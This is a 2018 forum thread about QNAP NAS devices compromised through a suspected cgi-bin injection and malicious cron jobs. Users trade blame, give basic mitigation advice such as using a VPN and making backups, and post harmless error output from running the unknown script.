  4. Run virus software on your PCs.
  5. Use a VPN instead of opening incoming ports on the router.
  6. Make frequent backups for protection.


That sounds like a lot of work, reading, and educating myself on many things.... simpler path.. blame vendor for my choices. :wink:
Paul

Model: TS-877-1600 FW: 4.4.3.x
QTS (SSD): [RAID-1] 2 x 1TB WD Blue m.2's
Data (HDD): [RAID-5] 6 x 3TB HGST DeskStar
VMs (SSD): [RAID-1] 2 x 500GB Evo 860
Ext. (HDD): TR-004 [Raid-5] 4 x 4TB HGST Ultastor
RAM: Kingston HyperX Fury 64GB DDR4-2666
GPU: EVGA GTX 1060 6GB
UPS: CP AVR1350

Model:TVS-673 32GB FW: 4.4.3.x Test/Backup Box
Model:TS-228a FW: 4.4.3.x Test/Backup Box
-----------------------------------------------------------------------------------------------------------------------------------------
NAS RAID Rebuild Times | Live QTS Videos | | QNAP NAS Guide | Information needed when you ask for HELP | QNAP Links, Tutorials, etc.
2018 Plex NAS Compatibility Guide | QNAP Plex FAQ | Moogle's QNAP Faq

robert_m_muench
Getting the hang of things
Posts: 88
Joined: Mon Feb 12, 2018 9:26 pm

Re: Strange folders and cronjobs

Post by robert_m_muench » Thu Sep 13, 2018 1:02 am

Don wrote:Everyone puts the blame on QNAP without accepting any blame themselves. By opening up ports on your router and directing them to your NAS you will be attacked. If I need to access my equipment at home when I am away I use a VPN. Guess what? I have not been compromised.


That's the mitigation, sure. But anyway QNAP did deliver insecure applications to its users. If they want to deliver such many features, and they promote this stuff, they should take care. Quite simple.

Since QNAP is not acting quick and transparent here, I suggest we go public via Twitter and let the world know. (good post to this: https://www.troyhunt.com/the-effectiven ... -security/)
TVS-1282T3
CPU: Intel Core i7-7700 CPU @ 3.60GHz
Memory: 64 GB
2 x Samsung SSD 850 EVO M.2 1TB (M.2 SATA)
2 x Samsung SSD 860 EVO 2TB (SATA)
4 x WDC WD6002FFWX-68TZ4N0 (SATA) (6TB)
4 x Seagate ST12000VN0007-2GS116 (SATA) (12TB)

robert_m_muench
Getting the hang of things
Posts: 88
Joined: Mon Feb 12, 2018 9:26 pm

Re: Strange folders and cronjobs

Post by robert_m_muench » Thu Sep 13, 2018 1:04 am

GuyLerome wrote:I got hit by this as well, on the same date. Needless to say I'm not impressed with QNAP at all.

But I suffered from another hack back in May, possibly same vector (cgi-bin injection).

I have some files if anyone is interested, I'd be interested to have the following unscrambled (it was running as a crontab task):


I went over to: https://www.tutorialspoint.com/execute_bash_online.php and pasted the code in, this is the output:

Code: Select all

bash: line 2: /home/httpd/cgi-bin/syslog.cgi: No such file or directory
chmod: cannot access '/home/httpd/cgi-bin/syslog.cgi': No such file or directory
main.sh: line 77: warning: here-document at line 60 delimited by end-of-file (wanted `suwVACZYaJDrk')
main.sh: line 60: /home/httpd/cgi-bin/iscsitargetsetting.cgi: No such file or directory


Good, this at least gives some idea, what the hack tries to do.
TVS-1282T3
CPU: Intel Core i7-7700 CPU @ 3.60GHz
Memory: 64 GB
2 x Samsung SSD 850 EVO M.2 1TB (M.2 SATA)
2 x Samsung SSD 860 EVO 2TB (SATA)
4 x WDC WD6002FFWX-68TZ4N0 (SATA) (6TB)
4 x Seagate ST12000VN0007-2GS116 (SATA) (12TB)

robert_m_muench
Getting the hang of things
Posts: 88
Joined: Mon Feb 12, 2018 9:26 pm

Re: Strange folders and cronjobs

Post by robert_m_muench » Thu Sep 13, 2018 1:07 am

TVS-1282T3
CPU: Intel Core i7-7700 CPU @ 3.60GHz
Memory: 64 GB
2 x Samsung SSD 850 EVO M.2 1TB (M.2 SATA)
2 x Samsung SSD 860 EVO 2TB (SATA)
4 x WDC WD6002FFWX-68TZ4N0 (SATA) (6TB)
4 x Seagate ST12000VN0007-2GS116 (SATA) (12TB)

User avatar
Don
Guru
Posts: 12004
Joined: Thu Jan 03, 2008 4:56 am
Location: Long Island, New York

Re: Strange folders and cronjobs

Post by Don » Thu Sep 13, 2018 2:17 am

Why such vengeance? Are you going to warn the world about every vulnerability in every software product? I think you should since you feel so strongly that they need to be fixed immediately.
Read the Online Manuals and use the forum search feature before posting.

It is a recommended to use RAID and have external backups. RAID will protect you from disk failure, keep your system running, and data accessible while the disk is replaced and the RAID rebuilt. Backups will allow you to recover data that is lost or corrupted, or from system failure. One does not replace the other.

Submit bugs and feature requests to QNAP via their Helpdesk app.

NAS: TVS-882BR | F/W: 4.3.6.0895 | 40GB | 2 x M.2 SATA RAID 1 (System/VMs) | 4 x M.2 NMVe QM2-4P-384A RAID 5 (Cache) | 5 x 4TB HDD RAID 6 (Data) | 1 x Blu-ray
NAS: TVS-663 | F/W: 4.4.2.1320 | 16GB | 2 x M.2 NMVe QM2-2P RAID 1 (Cache) | 4 x 4TB RAID 5
Apps: Boinc, Squid, DNSMasq, PLEX, iDrive, QVPN, QLMS, MP3fs, HBS, Entware, DLstation, +others

Post Reply

Return to “System & Disk Volume Management”